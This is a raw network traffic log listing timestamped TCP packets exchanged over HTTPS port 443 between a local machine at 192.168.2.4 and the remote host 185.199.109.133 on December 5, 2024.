Dec 5, 2024 19:36:31.716984034 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.716996908 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.717024088 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.725239992 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.725256920 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.725317955 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.725337029 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.725374937 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.733520031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.733540058 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.733602047 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.733619928 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.733655930 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.787395954 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.787416935 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.787494898 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.787518978 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.787569046 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.794698000 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.794714928 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.794799089 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.794821978 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.794878006 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.803004026 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.803023100 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.803066969 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.803086042 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.803121090 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.803134918 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.894289970 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.894309044 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.894398928 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.894422054 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.894469023 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.902585030 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.902602911 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.902677059 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.902689934 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.902730942 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.909683943 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.909708023 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.909784079 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.909802914 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.909895897 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.917315006 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.917337894 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.917402983 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.917418957 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.917783976 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.925350904 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.925374031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.925442934 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.925457954 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.925563097 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.979888916 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.979917049 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.979985952 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.980005980 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.980041981 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.980060101 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.987329960 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.987348080 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.987396002 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.987411022 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.987446070 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.995711088 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.995731115 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.995778084 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.995790005 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:31.995826006 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:31.995835066 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.086513042 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.086539984 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.086611032 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.086632013 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.086654902 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.086677074 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.094039917 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.094065905 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.094127893 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.094141960 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.094175100 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.094193935 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.102380037 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.102401018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.102471113 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.102493048 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.102580070 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.109998941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.110021114 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.110065937 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.110081911 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.110107899 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.110124111 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.118320942 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.118340015 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.118386030 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.118406057 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.118422985 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.118439913 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.172118902 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.172142982 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.172190905 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.172211885 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.172223091 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.172243118 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.179327011 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.179352999 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.179399014 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.179415941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.179440022 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.179454088 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.187685966 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.187711954 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.187740088 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.187757015 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.187777042 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.187794924 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.278646946 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.278680086 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.278894901 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.278928041 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.278976917 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.286045074 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.286067963 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.286147118 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.286155939 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.286986113 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.294384956 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.294410944 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.294457912 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.294466019 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.294488907 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.294512033 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.302699089 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.302722931 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.302783966 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.302793026 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.302973032 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.311017990 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.311049938 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.311115980 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.311125994 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.312062979 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.363917112 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.363950014 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.364197969 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.364222050 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.367000103 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.371850014 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.371867895 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.371939898 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.371952057 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.373159885 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.379997015 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.380016088 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.380081892 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.380095005 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.382987022 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.470640898 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.470671892 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.470923901 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.470953941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.471007109 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.478430033 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.478446960 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.478543043 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.478557110 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.478602886 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.486819983 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.486835957 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.486893892 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.486905098 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.486949921 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.494113922 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.494132042 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.494191885 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.494204044 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.494260073 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.502358913 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.502373934 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.502427101 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.502439976 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.502507925 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.556094885 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.556123972 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.556310892 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.556348085 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.558983088 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.564106941 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.564121962 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.564196110 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.564208031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.566982031 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.571515083 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.571532011 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.571592093 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.571604013 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.572133064 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.663079977 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.663113117 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.663177967 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.663196087 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.663211107 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.663239956 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.670957088 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.670979977 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.671020985 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.671030998 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.671041012 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.671066999 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.678900957 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.678929090 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.678972006 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.678986073 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.679008961 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.679025888 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.687299013 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.687324047 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.687356949 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.687371969 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.687391996 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.687408924 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.694813967 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.694837093 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.694892883 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.694906950 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.694921017 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.694947958 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.750716925 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.750746012 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.750808954 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.750834942 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.750848055 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.750875950 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.759284019 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.759310961 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.759365082 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.759376049 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.759402037 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.759419918 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.767318964 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.767338991 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.767383099 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.767395973 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.767406940 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.767433882 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.855479956 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.855505943 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.855549097 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.855570078 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.855580091 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.855607986 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.862757921 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.862781048 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.862823009 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.862837076 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.862864017 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.862890005 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.871253014 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.871282101 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.871325970 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.871342897 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.871352911 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.871376991 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.879405022 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.879425049 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.879466057 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.879482031 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.879618883 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.886626005 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.886651993 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.886702061 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.886719942 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.886737108 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.886761904 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.942756891 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.942786932 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.942823887 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.942845106 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.942854881 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.942881107 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.950795889 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.950820923 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.950870991 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.950886965 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.950900078 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.950922012 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.959175110 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.959201097 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.959250927 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:32.959264994 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:32.959323883 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.047751904 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.047791004 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.047832012 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.047853947 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.047863960 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.047889948 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.054852962 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.054874897 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.054932117 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.054949999 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.054989100 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.062788010 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.062808990 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.062848091 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.062855959 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.062882900 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.062901020 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.070967913 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.070991993 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.071038961 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.071048975 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.071079016 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.071100950 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.078114986 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.078136921 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.078185081 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.078198910 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.078214884 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.078239918 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.135466099 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.135503054 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.135771990 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.135788918 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.136049986 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.142337084 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.142359972 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.142455101 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.142477036 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.142517090 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.150542974 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.150568008 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.150667906 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.150679111 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.150723934 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:33.239725113 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.239753962 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:33.239965916 CET	49733	443	192.168.2.4	185.199.109.133
